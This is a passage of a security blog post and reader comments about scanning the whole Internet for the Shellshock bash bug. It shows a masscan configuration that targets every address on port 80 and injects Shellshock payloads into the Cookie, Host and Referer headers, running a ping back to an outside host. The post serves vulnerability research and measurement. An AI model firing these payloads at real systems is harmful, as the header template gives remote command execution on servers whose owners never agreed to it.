The configuration file for masscan looks something like:
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74
Some earlier results show that this bug is widespread:
I'll update later as I get more results with statistics.
8 comments:
Just got scanned by your scanner ;)
Just got a notification because of your bot.
A lot of those IP addresses you blocked out are pretty easy to read. Just sayin'
Roman, how might someone set up notifications like that?
Got a notification too :)
>> This works by stuffing a bunch of "ping home" commands in various CGI variables.
Please, give us more details on this and write a follow up to this post.
Can you give some more information on your test and what you're looking for? I tried this on a fresh Ubuntu system with apache2 installed, vulnerable, nothing. Updated to get a view of what a clean image looks like. Also ran it against Metasploitable.
I know the majority of systems won't respond as vulnerable (as you mentioned in your wormable post). Do you have anything about the proper setup for a system that would report vulnerable so I can get an eye on what to look for?
Thanks for the coverage on this.
You just triggered our IPS!
Close, but no cigar.